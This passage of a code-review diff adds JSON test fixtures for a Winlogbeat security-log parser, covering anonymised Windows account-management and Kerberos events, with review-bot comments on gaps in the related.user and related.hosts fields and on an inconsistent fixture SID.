Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's 
password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account 
Management", + "code": "4723", + "kind": "event", + "module": "security", + "original": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:59:04.757000Z", + "action": { + "id": 4723, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a28ebbf", + "SubjectUserName": "ACCOUNT", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "123456-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4723", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a28ebbf" + }, + "opcode": "Info", + "process": { + "pid": 
756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13043050897", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json new file mode 100644 index 000000000..31cca5f97 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4725.json 
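Review bot: `related.user` in the 4723 expected output contains only the subject account, although `user.target.name` is also populated; for 4723 subject and target are both `ACCOUNT`, so nothing is lost here, but in 4722, 4725 and 4726 the target account (`ACC_NAME`, `ACCOUNT`, `smithee.a`) never reaches `related.user`. An analyst pivoting on the affected account name through `related.user` would miss the enable, disable or delete event for that account. If the parser is expected to include the target, the fixtures should pin e.g. `"user": ["account-name", "ACC_NAME"]` for 4722; the parser that produces this field is outside this chunk.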
@@ -0,0 +1,111 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon 
ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4725", + "kind": "event", + "module": "security", + "original": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount 
Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:41:11.055000Z", + "action": { + "id": 4725, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x493fa12d", + "SubjectUserName": "jdoe", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-4-5-6", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "jdoe", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4725", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x493fa12d" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 7304 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042691344", + "task": "User Account Management" + } + } +} \ No newline at end of file 
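Review bot: The 4725 fixture is internally inconsistent in its anonymization: the `event.original` text gives the target Security ID as `S-1-2-3-4-5`, while `winlog.event_data.TargetSid` in the input, and hence `action.properties.TargetSid` in the expected output, is `S-4-5-6`. A real event carries the same SID in both places, so the fixture no longer demonstrates that the parser keeps them aligned, and any future check that extracts the SID from the message would silently disagree with `event_data`. Suggest using `S-1-2-3-4-5` in both places, as the 4722 and 4726 fixtures do. All new fixtures in this series also end without a trailing newline (`\ No newline at end of file`); adding one keeps diffs and editors quieter.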
diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json
new file mode 100644
index 000000000..e147e2eb4
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4726.json
@@ -0,0 +1,84 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}" + }, + "expected": { + "message": 
"{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", + "event": { + "action": "User Account Management", + "code": "4726", + "kind": "event", + "module": "security", + "original": "A user account was deleted.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tdoe.j\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3005C1F76\n\nTarget 
Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tsmithee.a\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T07:58:13.288000Z", + "action": { + "id": 4726, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3005c1f76", + "SubjectUserName": "doe.j", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "smithee.a" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-ABCD-ef90-1234-abcdef123456", + "name": "hostname", + "type": "winlogbeat", + "version": "7.17.1" + }, + "host": { + "name": "hostname.domain.net" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "doe.j" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "doe.j", + "target": { + "domain": "DOMAIN", + "name": "smithee.a" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.domain.net", + "event_id": "4726", + "logon": { + "id": "0x3005c1f76" + }, + "process": { + "pid": 632, + "thread": { + "id": 2056 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "25349190364", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json new file mode 100644 index 000000000..53d650df2 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4768.json 
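Review bot: The 4726 expected output has no `related.hosts`, although `host.name` is `hostname.domain.net` and `winlog.computer_name` carries the same value; in 4722, 4723 and 4725 `related.hosts` is populated, apparently from `host.hostname`, which this winlogbeat 7.17 input does not provide. Pivoting on a host through `related.hosts` would therefore miss events from agents that only set `host.name`. If that is the intended parser behaviour the fixture is correct as written; otherwise it should pin `"hosts": ["hostname.domain.net"]` under `related` and the parser adjusted accordingly (outside this chunk).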
@@ -0,0 +1,102 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de 
l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}" 
+ }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies 